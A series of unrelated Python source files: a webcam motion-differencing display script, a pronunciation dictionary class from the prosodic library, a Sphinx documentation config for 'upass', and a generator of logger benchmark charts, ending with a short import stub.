display_width = x_dim
display_height = y_dim
gameDisplay = pygame.display.set_mode((display_width,display_height))
pygame.display.set_caption('Most recent image')
black = (0,0,0)
white = (255,255,255)
clock = pygame.time.Clock()
crashed = False
import matplotlib.pyplot as plt
def show_pic(imgtaken, x=0,y=0):
gameDisplay.blit(imgtaken, (x,y))
gameDisplay.fill(white)
c_photo = photo()
pil_c_photo = Image.open(c_photo)
numpy_pic = numpy.array(pil_c_photo)
b_photo = photo()
pil_b_photo = Image.open(b_photo)
numpy_pic_b = numpy.array(pil_b_photo)
mask = numpy_pic_b > numpy_pic + 30 #the +30 gets rid of noise
mask2 = numpy_pic_b < numpy_pic - 30
lol = mask + mask2
e_pic = numpy_pic.copy()
num = 0
while not crashed:
for event in pygame.event.get():
if event.type == pygame.QUIT:
crashed = True
timenow = time.time()
e_photo = str(timenow).split(".")[0]
e_photo= "numpy_"+str(timenow)+".jpg"
num = num + 1
b_photo = c_photo
c_photo = photo()
numpy_pic_b = numpy_pic.copy()
pil_c_photo = Image.open(c_photo)
numpy_pic = numpy.array(pil_c_photo)
print numpy_pic.size
#print len(numpy_pic[3])
print "###"
#print numpy_pic[1:,1,1]
#a = np.arange(100)
print "##########"
#numpy_pic[1:500, range(0, len(numpy_pic[2]), 10), 1] = 0
#for x in numpy_pic[1:500, range(0, len(numpy_pic[2])), 1]:
# if x >= 100:
# x = 255
#for x in range(10,170,10):
# mask = numpy_pic < x
# numpy_pic[mask] = 255-x #numpy_pic[mask] + numpy_pic[mask]
#for x in range(200,255,5):
# mask = numpy_pic > x
# numpy_pic[mask] = 0+(x/10) # numpy_pic[mask] / numpy_pic[mask]+(numpy_pic[mask]/numpy_pic[mask])
#print numpy_pic[1:,1,1]
#print numpy_pic.min()
print "###"
#print numpy_pic.shape #Array dimensions
#print numpy_pic.ndim #Number of array dimensions
#print numpy_pic.dtype #Data type of array elements
#print numpy_pic.dtype.name #Name of data type
#print numpy_pic.mean()
#print numpy_pic.max()
#print numpy_pic.min()
#print numpy.info(numpy.ndarray.dtype)
#print numpy_pic.astype(int)
#mask = numpy_pic > numpy_pic_b
#mask = numpy_pic[:, :, 2] > 150
#numpy_pic[mask] = [0, 0, 255]
#lol = numpy_pic +
#mask = numpy_pic_b > numpy_pic + 30 #the +30 gets rid of noise
#mask2 = numpy_pic_b < numpy_pic - 30
margin = 20
maskr = numpy_pic[:, :, 0] < numpy_pic_b[:, :, 0] - margin
maskg = numpy_pic[:, :, 1] < numpy_pic_b[:, :, 1] - margin
maskb = numpy_pic[:, :, 2] < numpy_pic_b[:, :, 2] - margin
maskr2 = numpy_pic[:, :, 0] > numpy_pic_b[:, :, 0] + margin
maskg2 = numpy_pic[:, :, 1] > numpy_pic_b[:, :, 1] + margin
maskb2 = numpy_pic[:, :, 2] > numpy_pic_b[:, :, 2] + margin
#numpy_pic[mask] = [0, 0, 255]
#lol_old = lol
#lol = mask + mask2
#lol = lol + lol_old
persist = 'ohhh'
if persist == 'True':
numpy_pic[maskr] = [255, 0, 0]
numpy_pic[maskg] = [0, 255, 0]
numpy_pic[maskb] = [0, 0, 255]
numpy_pic[maskb2] = [0, 0, 100]
numpy_pic[maskr2] = [100, 0, 0]
numpy_pic[maskg2] = [0, 100, 0]
Image.fromarray(numpy_pic).save(e_photo)
elif persist == 'False':
old_e = e_pic
e_pic = numpy_pic.copy()
e_pic[maskr] = [255, 0, 0]
e_pic[maskg] = [0, 255, 0]
e_pic[maskb] = [0, 0, 255]
e_pic[maskr2] = [100, 0, 0]
e_pic[maskg2] = [0, 100, 0]
e_pic[maskb2] = [0, 0, 100]
show1 = 'waa'
if show1 == '1':
e_pic = ((e_pic/4) - (numpy_pic))*3
e_pic = e_pic / 3 + old_e / 2
elif show1 == 'tripsy':
e_pic = ((e_pic/4) - (numpy_pic))*3
e_pic = e_pic - old_e / 2
elif show1 == 'waa':
e_pic = ((e_pic/4) - (numpy_pic))*3
#e_pic = old_e * 0.8 + e_pic * 0.2
Image.fromarray(e_pic).save(e_photo)
elif persist == 'ohhh':
old_e = e_pic.copy()
mask_b_pic = numpy_pic.copy()
mask_d_pic = numpy_pic.copy()
mask_b_pic[maskr] = [255, 255, 255]
mask_b_pic[maskg] = [255, 255, 255]
mask_b_pic[maskb] = [255, 255, 255]
mask_d_pic[maskr2] = [0, 0, 0]
mask_d_pic[maskg2] = [0, 0, 0]
mask_d_pic[maskb2] = [0, 0, 0]
#e_pic = e_pic/6 + old_e
e_pic = [200, 200, 0]
#e_pic = e_pic/2 - ((mask_d_pic) + (mask_b_pic))
#e_pic = e_pic/2 + ((mask_d_pic) + (mask_b_pic))
#choose one of the following
#e_pic = mask_d_pic #shows when pixel is darker than it was
#e_pic = mask_b_pic #shows when pixel is lighter than prior
e_pic = mask_d_pic - mask_b_pic #black execpt for movement
e_pic = mask_b_pic / (mask_d_pic / 100) #black execpt for movement
#e_pic = mask_d_pic + mask_b_pic #looks odd
Image.fromarray(e_pic).save(e_photo)
#plt.imshow(lol)
#plt.show()
#Image.fromarray(numpy_pic).save(e_photo)
onscreen = pygame.image.load(e_photo)
gameDisplay.blit(onscreen, (0,0))
pygame.display.update()
if trig == True:
print("Waiting for input before taking next image...")
tp = raw_input("press return to take picture; ")
if tp == "q":
print("---bye!")
exit()
clock.tick(20)
if loop == True:
pygame.time.wait(num)
clock.tick(20)
elif trig == False and loop == False:
crashed = True
#while True:
#pygame.time.wait(1000)
#clock.tick(20)
pygame.quit()
quit()
|
# -*- coding: UTF-8 -*-
import os,pickle,glob,time,sys
from tools import *
from entity import *
from Word import Word
from Syllable import Syllable
from ipa import ipa
import codecs
class Dictionary: # cf Word, in that Text.py will really instantiate Dictionary_en,Dictionary_fi,usw.
classnames=['Phoneme','Onset','Nucleus','Coda','Rime','SyllableBody','Syllable','Word','Phrase']
char2phons=[]
for k in ipa.keys():
if len(k)>1:
for x in k[1:]:
char2phons.append(x)
def __init__(self,lang):
import prosodic
dirself=prosodic.dir_prosodic
libfolder=os.path.join(dirself,'lib')
dictsfolder=os.path.join(dirself,'dicts')
self.config=prosodic.config
self.lang = lang
self.libfolder = libfolder
self.dictsfolder = os.path.join(dictsfolder,self.lang)
sys.path.append(self.dictsfolder)
self.language=""
self.getprep=False
self.booted=False
for filename in glob.glob(os.path.join(self.dictsfolder, self.lang+'*')):
self.language = filename.split(os.path.sep).pop().split(".")[0]
break
if not self.language:
exit('!! language could not be ascertained from files in '+self.dictsfolder+'. Please name your .tsv and/or .py dictionary file(s) using a string which begins with the two characters which serve as the name for the dictionary folder (eg, "en")')
self.unstressedWords=[]
for filename in glob.glob(os.path.join(self.dictsfolder, 'unstressed*')):
file=codecs.open(filename,encoding='utf-8')
for ln in file:
for word in ln.split():
self.unstressedWords.append(word)
file.close()
break
self.maybestressedWords=[]
for filename in glob.glob(os.path.join(self.dictsfolder, 'maybestressed*')):
file=codecs.open(filename,encoding='utf-8')
for ln in file:
for word in ln.split():
self.maybestressedWords.append(word)
file.close()
break
pyfile=os.path.join(self.dictsfolder,self.language+'.py')
if os.path.exists(pyfile):
self.getprep=get_class(self.language+'.get')
self.cachefolder=os.path.join(self.dictsfolder,'_cache')
self.dictentries=None
build=False
## language objects
timestart=time.clock()
if being.persists:
if __name__=='__main__':
print "## booting ontology: " + self.language + " ..."
if not os.path.exists(self.cachefolder):os.mkdir(self.cachefolder)
self.storage = FileStorage(self.cachefolder+'ontology.zodb')
self.db = DB(self.storage)
self.conn = self.db.open()
self.dict = self.conn.root()
self.t=transaction
if not len(self.dict.values()):
build=True
else:
self.dict={}
self.refresh()
topickle=self.exists_pickle()
topickle=False
if topickle:
self.boot_pickle(topickle)
else:
build=True
if build:
self.refresh()
self.boot()
if __name__=='__main__':
print self.stats(prefix="\t").replace("[[time]]",str(round((time.clock() - timestart),2)))
def boot(self): ## NEEDS EXTENSION
if not self.getprep:
bootfile=os.path.join(self.dictsfolder,self.language+'.tsv')
if os.path.exists(bootfile):
self.boot_general(bootfile)
self.booted=True
if not self.booted:
exit("<error:dictionary> neither a "+self.language+".tsv nor a "+self.language+".py in directory "+self.dictsfolder)
def str2unicode(self,string):
o=u""
for x in string:
try:
o+=unicode(x)
except UnicodeDecodeError:
print "error"
o+=unichr(ord(x))
return o
def boot_general(self,bootfile):
if __name__=='__main__':
print "## booting dictionary: " + self.language + " ..."
file=codecs.open(bootfile,encoding='utf-8')
for ln in file:
line=ln.split('\t')
line.reverse()
token=line.pop().strip()
if token.startswith('#'): continue
stressedipa=line.pop().strip()
if ("." in token) and (token.count(".")==stressedipa.count(".")):
sylls_text=token.split(".")
token=token.replace(".","")
else:
sylls_text=None
#line.reverse()
#otherfeats=line
if (not token in self.dict['Word']):
self.dict['Word'][token]=[]
self.dict['Word'][token].append((stressedipa,sylls_text))
def build(self): ## NEEDS EXTENSION
pass
def refresh(self):
if being.persists:
self.dict.clear()
for k in Dictionary.classnames:
self.dict[k]=OOBTree()
else:
for k in Dictionary.classnames:
self.dict[k]={}
# boot options
def exists_pickle(self,picklefile=False):
if not picklefile:
picklefile=self.dictsfolder+self.language+'.pickle'
if not os.path.exists(picklefile):
return False
else:
return picklefile
def boot_pickle(self,picklefile):
file=open(picklefile)
self.dict=pickle.load(file)
file.close()
def boot_dict(self,filename): # filename = *.txt or *.pickle
print ">> loading Dictionary " + filename + "..."
fileobj = open(self.dictsfolder + filename, 'r')
if filename[-7:] == ".pickle":
return None # the bare-bones text file [language].tsv should not be pickled--wasteful
elif filename[-4:] == ".txt":
dictionary = {}
curLine = fileobj.readline().strip()
while(curLine):
curLine = fileobj.readline().strip()
if(curLine == ""): break
if(curLine.startswith("#")): continue
tokens = curLine.split()
if(len(tokens) < 2): continue
curKey = tokens[0].lower()
if("(" in curKey):
wrd = curKey.split("(")[0].strip()
else:
wrd = curKey.strip()
if(not wrd in dictionary):
dictionary[wrd] = []
dictionary[wrd].append(curLine)
self.dictentries=dictionary
else:
self.dictentries={}
# boot_dict_specific
def boot_dict_specific(self,filename,sep="\t"):
newdict={}
if (not "/" in filename):
filename=self.dictsfolder+filename
file=open(filename,'r')
for line in file:
linedat=line.split(sep)
key=linedat[0]
val=linedat[1]
if key.startswith('#'): continue
if (not key in newdict):
newdict[key]=val
else:
if type(newdict[key])==list:
newdict[key].append(val)
else:
newdict[key]=[newdict[key],val]
return newdict
def boot_build(self):
self.build(save=False)
# lookup options
def lookup_db(self,tok): # needs to be rewritten
rows=[]
for row in self.c.execute('select entry from dict where lower(word)="' + tok.lower() + '"'):
for x in row:
if (not x in rows):
rows.append(x)
return rows
def lookup_dict(self,tok):
if (not tok in self.dict):
return {}
else:
return self.dictentries[tok]
def gleanPunc(self,word):
return gleanPunc(word)
def has(self,word):
if not word: return False
word=unicode(word)
(p0,word,p1)=gleanPunc2(word)
word_l = word.lower()
## if not there, but a contractino
# if already there, say yes
if word_l in self.dict['Word'] and self.dict['Word'][word_l]: return True
"""
for contr,add_ipa in [("'s","z"), ("'d","d")]:
if word_l.endswith(contr):
word_l_unc = word_l[:-2]
# if the uncontracted in the dictionary
if word_l_unc in self.dict['Word'] and self.dict['Word'][word_l_unc]:
for obj in self.dict['Word'][word_l_unc]:
if type(obj) in [tuple]:
ipa,sylls_text=obj
else:
ipa=obj.ipa
sylls_text=obj.sylls_text
ipa+=add_ipa
#sylls_text[-1]+=contr
## save new word
if not word_l in self.dict['Word']: self.dict['Word'][word_l]=[]
self.dict['Word'][word_l]+=[(ipa,sylls_text)]
"""
return (word_l in self.dict['Word'] and self.dict['Word'][word_l])
def use(self,classtype,key):
"""
HACKED 9/29/16: No longer caching SyllableBodies. Reuse was causing bugs. More thorough solution would be helpful.
"""
if type(key)==type([]):
key=tuple(key)
if (not key in self.dict[classtype]):
if classtype in ['Phoneme','Onset','Nucleus','Coda','Rime','Syllable']:
self.dict[classtype][key]=get_class(classtype+'.'+classtype)(key,self.lang)
#return get_class(classtype+'.'+classtype)(key,self.lang)
elif classtype=="SyllableBody":
#self.dict[classtype][key]=self.syllphon2syll(key,self.lang)
return self.syllphon2syll(key,self.lang)
return self.dict[classtype][key]
def haveAlready(self,classtype,key):
if type(key)==type([]):
key=tuple(key)
return (key in self.dict[classtype])
def ipa2phons(self,stressedipa):
sylls=[]
for syllphon in stressedipa.split("."):
syll=[]
syllphon.strip()
for i in range(len(syllphon)):
phon=syllphon[i]
if (phon in Dictionary.char2phons): continue
if (phon=="`") or (phon=="'"): continue
try:
phonN=syllphon[i+1]
except IndexError:
phonN=False
if phonN and (phonN in Dictionary.char2phons):
phon=phon+phonN
phonobj=self.use('Phoneme',phon)
syll.append(phonobj)
Vwaslast=False
k=-1
for phon in syll:
k+=1
if phon.isVowel():
if Vwaslast:
if self.haveAlready('Phoneme', (Vwaslast.phon,phon.phon)):
newphon=self.use('Phoneme',(Vwaslast.phon,phon.phon))
else:
newphon=get_class('Phoneme.Phoneme')([self.use('Phoneme',x) for x in [Vwaslast.phon,phon.phon]], self.lang)
#self.dict['Phoneme'][(Vwaslast.phon,phon.phon)]=newphon
self.dict['Phoneme'][Vwaslast.phon+phon.phon]=newphon
syll[k]=newphon
syll.remove(Vwaslast)
break
else:
Vwaslast=phon
sylls.append(tuple(syll))
return sylls
def syllphon2syll(self,syllphon,lang):
onset=[]
nucleus=[]
coda=[]
for x in syllphon:
if x.isVowel():
nucleus.append(x)
else:
if not nucleus:
onset.append(x)
else:
coda.append(x)
return get_class('SyllableBody.SyllableBody')(self.use('Onset',onset),self.use('Rime', (self.use('Nucleus',nucleus),self.use('Coda',coda))), lang)
def stressedipa2stress(self,stressedipa):
o=""
for x in stressedipa.split("."):
if "'" in x:
o+="P"
elif "`" in x:
o+="S"
else:
o+="U"
return o
def getStrengthStress(self,stress):
prom_stress=[]
prom_strength=[]
for x in stress:
if x=='P': prom_stress+=[1.0]
elif x=='S': prom_stress+=[0.5]
elif x=='U': prom_stress+=[0.0]
for i,x in enumerate(prom_stress):
prevx=prom_stress[i-1] if i-1>=0 else None
nextx=prom_stress[i+1] if i+1<len(prom_stress) else None
#print i,prevx,x,nextx
if nextx!=None and nextx>x:
strength=0.0
elif nextx!=None and nextx<x:
strength=1.0
elif prevx!=None and prevx>x:
strength=0.0
elif prevx!=None and prevx<x:
strength=1.0
else:
strength=None
#print i,prevx,x,nextx
prom_strength+=[strength]
return (prom_stress,prom_strength)
def getStrengthStress0(self,stress):
prom_strength=[]
prom_stress=[]
for i in range(len(stress)):
syll=stress[i]
syllP=False
syllN=False
try:
syllP=stress[i-1]
except IndexError:
pass
try:
syllN=stress[i+1]
except IndexError:
pass
if syll=="P":
prom_stress.append(1.0)
if (len(stress)>1):
if syllN and (syllN=="P"):
prom_strength.append(None)
elif syllP and (syllP=="P"):
if len(stress)>2:
prom_strength.append(1.0)
else:
prom_strength.append(None)
else:
prom_strength.append(1.0)
elif syll=="S":
prom_stress.append(0.5)
if (len(stress)>1):
if syllP and ((syllP=="P") or (syllP=="S")):
prom_strength.append(0.5)
elif syllN and (syllN=="P"):
prom_strength.append(0.5)
else:
prom_strength.append(0.5)
elif syll=="U":
prom_stress.append(0.0)
if (len(stress)>1):
if syllP and ((syllP=="P") or (syllP=="S")):
prom_strength.append(0.0)
elif syllN and ((syllN=="P") or (syllN=="S")):
prom_strength.append(0.0)
else:
prom_strength.append(None)
if len(stress)==1:
prom_strength=[None]
return (prom_stress,prom_strength)
def reset(self):
for classtype in [ct for ct in self.dict if ct!='Word']: self.dict[classtype]={}
for word in self.dict['Word']:
self.dict['Word'][word]=[((wordobj.ipa,wordobj.sylls_text) if type(wordobj)!=tuple else wordobj) for wordobj in self.dict['Word'][word]]
def make(self,stressedipasylls_text,token):
stressedipa=stressedipasylls_text[0]
sylls_text=stressedipasylls_text[1]
stress=self.stressedipa2stress(stressedipa)
(prom_stress,prom_strength)=self.getStrengthStress(stress)
syllphons=self.ipa2phons(stressedipa)
sylls=[]
for i in range(len(syllphons)):
syllbody=self.use('SyllableBody',syllphons[i])
syll=self.use('Syllable',(syllbody,prom_strength[i],prom_stress[i]))
#print token,i,syllbody,syll,syllphons,stressedipa,stress,prom_stress,prom_strength
sylls.append(syll)
word=Word(token,sylls,sylls_text)
word.ipa=stressedipa
word.stress=stress
word.lang=self.lang
return word
def maybeUnstress(self,words):
word=words[0].token.lower()
def unstress_word(wordobj):
#wordobj.feat('functionword',True)
wordobj.feats['functionword']=True
wordobj.stress=""
for child in wordobj.children:
wordobj.stress+="U"
child.feats['prom.stress']=0.0
child.feats['prom.kalevala']=None
child.children[0].feats['prom.weight']=False
if word in self.maybestressedWords: # only for monosyllabs
wordobjs=self.dict['Word'][word]
stresses = [wordobj.stress for wordobj in wordobjs]
if max([len(sx) for sx in stresses])>1:
return wordobjs
if 'U' in stresses and 'P' in stresses:
unstressed_words = [wordobj for wordobj in wordobjs if wordobj.stress=='U']
for wordobj in unstressed_words: unstress_word(wordobj)
return wordobjs
else:
wordobj1=wordobjs[0]
ipa=wordobj1.ipa
if 'U' in stresses and not 'P' in stresses:
newipa="'"+ipa
newobjs=[self.make((_ipa,None),word) for _ipa in [ipa,newipa]]
#newobjs[0].feat('functionword',True)
newobjs[0].feats['functionword']=True
elif 'P' in stresses and not 'U' in stresses:
newipa=ipa[1:]
newobjs=[self.make((_ipa,None),word) for _ipa in [ipa,newipa]]
#newobjs[-1].feat('functionword',True)
newobjs[-1].feats['functionword']=True
else:
print "??",word,stresses
return newobjs
elif word in self.unstressedWords:
wordobj=self.dict['Word'][word][0]
unstress_word(wordobj)
return [wordobj]
return words
def get(self,word,stress_ambiguity=True):
if type(word)==str:
word=word.decode('utf-8',errors='ignore')
(word,punct)=gleanPunc(word)
if self.has(word):
words=self.dict['Word'][word.lower()]
elif self.getprep:
words=self.getprep(word,config=self.config)
else:
return [Word(word,[],None)]
if not words:
return [Word(word,[],None)]
if type(words)==list:
if type(words[0])==tuple: # New word needs to be built
wordobjs=[]
for wordtuple in words:
wrd=wordtuple[:2]
attrs=wordtuple[2] if len(wordtuple)>2 else {}
wordobj=self.make(wrd,word)
for _k,_v in attrs.items(): setattr(wordobj,_k,_v)
wordobjs+=[wordobj]
self.dict['Word'][word.lower()]=wordobjs
return self.maybeUnstress(wordobjs) if stress_ambiguity else wordobjs
else:
wordobjs=words
else:
wordobjs=[words]
return self.maybeUnstress(wordobjs) if stress_ambiguity else wordobjs
## featpaths:experimental
def featpath(self):
pass
# save options
def save_tabbed(self):
for k,v in self.dict.items():
if k!='word': continue # just the words for now
o="token\tstress\tipa\n"
for kk,vv in v.items():
if type(vv)!=type([]):
vv=[vv]
for vvv in vv:
if not vvv: continue
o+=str(kk)+"\t"+str(vvv.str_ipasyllstress())+"\n"
file=open(self.dictsfolder+self.language+'.tsv','w')
file.write(o)
file.close()
def save_pickle(self):
file=open(self.dictsfolder+self.language+'.pickle','w')
pickle.dump(self.dict,file)
file.close()
def persist(self):
if being.persists:
self.t.commit()
def save(self):
if being.persists:
print "saving..."
self.t.commit()
#transaction.commit()
self.save_tabbed()
def words(self):
words=[]
for k,v in self.dict['word'].items():
for vv in v:
words.append(vv)
return words
def close(self):
if being.persists:
self.conn.close()
## output option
def stats(self,prefix="\t"):
#self.numents={}
o=""
for k,v in self.dict.items():
if not len(v): continue
if k[-2:]=="us":
ks=k[:-2]+"i"
else:
ks=k+'s'
o+=prefix + str(len(v)).replace('0','?') + ' ' + ks + '\n'
if o:
return "## [[[time]]s] loaded:\n"+o
else:
return ""
return o
|
# -*- coding: utf-8 -*-
#
# upass documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 14 21:02:58 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.coverage', 'sphinx.ext.ifconfig', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'upass'
copyright = u'2015-2021, Chris Warrick'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.3.0'
# The full version, including alpha/beta/rc tags.
release = '0.3.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'upassdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'upass.tex', u'upass Documentation',
u'Chris Warrick', 'manual'),
]
latex_elements = {'papersize': 'a4paper', 'fontpkg': '\\usepackage{tgheros}',
'fncychap': '\\usepackage[Sonny]{fncychap}'}
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'upass', u'upass Documentation',
[u'Chris Warrick'], 1)
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
|
#!/usr/bin/python
import sys;
def sortedKeys(dict):
keys = dict.keys()
keys.sort()
return keys
if __name__ == '__main__':
i = 0
width = 1200
height = 600
reader = open(sys.argv[1], "r")
jsname = '%s.js' % sys.argv[1]
jswriter = open(jsname, "w")
htmlwriter = open(sys.argv[1] + '.html', "w")
charts = []
colors = ["'#F00'", "'#080'", "'#00009c'", "'orange'", "'purple'", "'grey'", "'cyan'", "'black'"]
name = ''
threads = ''
messages = ''
loggerMap = {}
threadsMap = {}
messagesMap = {}
timeMap = {}
gcMap = {}
for line in reader:
#print i , " " , line
line = line.strip()
idx = i % 3
a = line.split()
if idx == 0 :
name = a[0]
threads = a[4]
messages = a[6]
loggerMap[name] = True
threadsMap[int(threads)] = True
messagesMap[int(messages)] = True
elif idx == 1 :
time = float(a[3])
key = name + '_' + threads + '_' + messages
if key not in timeMap:
timeMap[key] = []
timeMap[key].append(time)
elif idx == 2 :
if len(line) == 0:
gc = 0.0
else :
gc = float(line)
key = name + '_' + threads + '_' + messages
if key not in gcMap:
gcMap[key] = []
gcMap[key].append(gc)
i = i + 1
v = []
v.append('threads')
v.append('messages')
for name in sortedKeys(loggerMap):
v.append(name + " throughput")
v.append(name + " gc")
jswriter.write('function drawChart(){ \n')
for threads in sortedKeys(threadsMap):
v = []
v.append(str(threads))
for messages in sortedKeys(messagesMap):
v2 = list(v)
v2.append(str(messages))
for name in sortedKeys(loggerMap):
key = name + '_' + str(threads) + '_' + str(messages)
avg = sum(timeMap[key])/len(timeMap[key])
v2.append('%.2f' % (float(messages) / avg))
# into ms
avg = sum(gcMap[key])/len(gcMap[key])
v2.append('%.2f' % (1000 * avg))
for threads in sortedKeys(threadsMap):
t = str(threads)
ts = str(threads)
tname = "threads"
if threads == 1:
tname = "thread"
ts = 'single'
v = []
for messages in sortedKeys(messagesMap):
v2 = []
v2.append("'" + str(messages) + "'")
vc = ['Messages']
for name in sortedKeys(loggerMap):
key = name + '_' + str(threads) + '_' + str(messages)
avg = sum(timeMap[key])/len(timeMap[key])
v2.append('%.2f' % (float(messages) / avg))
# into ms
#v2.append('%.2f' % (1000 * gcMap[key]))
vc.append(name)
v.append('[' + ( ','.join(v2)) + ']')
logger_names = ','.join(vc)
logger_names = '';
for i in range(0, len(vc)):
type = 'number'
if i == 0:
type = 'string'
logger_names = "%s\n\
data.addColumn('%s', '%s');" % (logger_names, type, vc[i])
chartname = 'throughput_%s_chart' % t
charts.append(chartname)
jswriter.write("\t/********* %s %s **************/ \n\
//throughput \n\
data = new google.visualization.DataTable(); \n\
%s \n\
data.addRows([ \n\
%s\n\
]); \n\
\n\
chart = new google.visualization.LineChart(document.getElementById('%s')); \n\
chart.draw(data, \n\
{ \n\
width: %d, height: %d, \n\
title: 'Throughput, %s %s', \n\
hAxis: {title: 'number of messages', titleTextStyle: {color: '#000'}, logScale: true}, \n\
vAxis: {title: 'messages / ms', gridlines: {color: '#ccc', count: 8}}, \n\
legend: {position: 'right', textStyle: {color: 'black', fontSize: 10}}, \n\
colors: [%s]\n\
});\n\
" % (ts, tname, logger_names, ',\n\t\t\t'.join(v), chartname, width, height, ts, tname, ','.join(colors)))
v = []
for messages in sortedKeys(messagesMap):
v2 = []
v2.append("'" + str(messages) + "'")
vc = ['Messages']
for name in sortedKeys(loggerMap):
key = name + '_' + str(threads) + '_' + str(messages)
#v2.append('%.2f' % (float(messages) / timeMap[key]))
# into ms
avg = sum(gcMap[key])/len(gcMap[key])
v2.append('%.2f' % (1000 * avg))
vc.append(name)
v.append('[' + ( ','.join(v2)) + ']')
logger_names = '';
for i in range(0, len(vc)):
type = 'number'
if i == 0:
type = 'string'
logger_names = "%s\n\
data.addColumn('%s', '%s');" % (logger_names, type, vc[i])
chartname = 'gc_%s_chart' % t
charts.append(chartname)
jswriter.write("//gc \n\
data = new google.visualization.DataTable(); \n\
%s\n\
data.addRows([ \n\
%s \n\
]); \n\
\n\
chart = new google.visualization.LineChart(document.getElementById('%s'));\n\
chart.draw(data, \n\
{\n\
width: %d, height: %d,\n\
title: 'Total stop the world, %s %s',\n\
hAxis: {title: 'number of messages', titleTextStyle: {color: '#000'}, logScale: true},\n\
vAxis: {title: 'ms', gridlines: {color: '#ccc', count: 8}},\n\
legend: {position: 'right', textStyle: {color: 'black', fontSize: 10}},\n\
colors: [%s]\n\
});\n" % (logger_names, ',\n\t\t\t'.join(v), chartname, width, height, ts, tname, ','.join(colors)))
jswriter.write('}\n')
htmlwriter.write('<html>\n\
<body>\n\
<div id="chart"></div>\n\
%s\n\
<script type="text/javascript" src="https://www.google.com/jsapi"></script>\n\
<script type="text/javascript" src="%s"></script>\n\
<script type="text/javascript">\n\
google.load("visualization", "1", {packages:["imagelinechart", "imagechart", "corechart"]});\n\
google.setOnLoadCallback(drawChart);\n\
</script>\n\
</body> \n\
</html>\n' % ( "\n".join(map(lambda c: '<div id="%s"></div>' % c, charts)), jsname ) )
jswriter.close()
htmlwriter.close()
|
import sys
import urllib
import urlparse
import xbmcgui
